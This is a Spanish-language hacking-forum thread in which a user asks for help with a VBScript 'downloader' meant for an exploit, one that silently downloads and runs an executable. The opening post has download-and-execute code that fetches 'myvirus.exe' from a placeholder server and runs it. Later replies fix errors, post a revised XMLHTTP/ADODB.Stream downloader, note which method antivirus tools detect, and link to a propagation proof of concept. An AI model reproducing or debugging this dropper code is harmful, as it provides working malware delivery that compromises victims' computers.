Hola, estoy tratando de encontrar el codigo fuente de un downloader en VBScript para utilizarlo en un exploit, de momento tengo esto, pero me salta un error...
Sub Main()
On Error Resume Next
Set wsl = CreateObject("WScript.Shell")
bd = DowloadFile("http://www.myserver.com/myvirus.exe","c:\v.exe")
If bd = True Then wsl.run "c:\v.exe"
End Sub
Function DowloadFile(Url,Path)
On Error Resume Next: Err.Clear
Set xml = CreateObject("Microsoft.XMLHTTP")
Set ads = CreateObject("ADODB.Stream")
xml.Open "GET", Url, False
xml.Send
ads.Mode = 3
ads.Type = 1
ads.Open
ads.Write(xml.ResponseBody)
ads.SaveToFile(Path,2)
If Err Then DownloadFile = False Else DowloadFile = True
End Function
Necesito descargar y ejecutar un exe silenciosamente por medio de VBScript, pero este codigo no funciona...Si alguien lo puede revisar y decirme como lo puedo hacer se lo agradeceria.
No es totalmente indispensable que sea en VBScript, tambien puede ser en BATCH o por medio de una shellcode, pero no me aclaro...
Un saludo, gracias.
Quitale el Sub Main() y End Sub, línea 1 y 9 respectivamente :P, pero de cualquier manera debo de advertirte que
ADODB.Stream es MUY detectado por los AV
Saludos
Me sigue saltando error: No se pueden utilizar parentesis al llamar a Sub. Cual puede ser el fallo?
Estoy buscando algun otro metodo sencillo pero no encuentro nada...No se como hacerlo, porque en batch?
Un saludo y muchas gracias!!
Ya he visto el problema .. intentalo así que es más sencillo (mismo método)
Set objxmlhttp = CreateObject("Microsoft.XMLHTTP")
objxmlhttp.Open "GET","http://www.myserver.com/myvirus.exe",0
objxmlhttp.Send()
Do until objxmlhttp.readystate = 4
wscript.sleep 200
Loop
Folder = replace(Wscript.scriptfullname,Wscript.scriptname,"")
Set objADO = CreateObject("ADODB.Stream")
objADO.Mode = 3
objADO.Type = 1
objADO.Open()
objADO.Write(objxmlhttp.responseBody)
objADO.SaveToFile Folder & "\calc.exe",2
Saludos :P
Lo acabo de probar y no tira ningun error pero el archivo no aparece por ninguna parte...Lo estoy probando con la calculadora de windows para mas info...
No encuentro el fallo, se podria hacer de alguna otra manera?
Un saludo y muchas gracias!
Pero la calculadora la has subido a algún servidor? Revisa en C:
Sino intenta de nuevo .. he modificado el code para que espere a que el archivo se haya bajado completamente, y que la calculadora aparezca en la misma ruta que el script
Saludos
La calculadora esta subida a un server y he revisaco C: y no aparece por ninguna parte...nose cual puede ser el problema, pruebo este nuevo y te digo, de todas formas muchas gracias por la ayuda...
Un saludo
Muy bien, y como veo que es lo que intentas hacer ....
http://foro.elhacker.net/scripting/htmlvbsbatch_propagacion_a_traves_de_internet_posible-t221250.0.html
Incluso hay un POC en uno de los mensajes que he dejado en ese tema ;)
Saludos
No funciono... >:( Bueno, voy a leer esto aver si soy capaz de echar la calculadora a andar...
Un saludo y muchisimas gracias por la ayuda!!!
La verdad ya no se ... los scripts estan bien ... solo aclarar que los que he dejado solo bajan, no ejecutan nada .. y por otra parte ,... has cambiado bien la URL en el script :xD
Saludos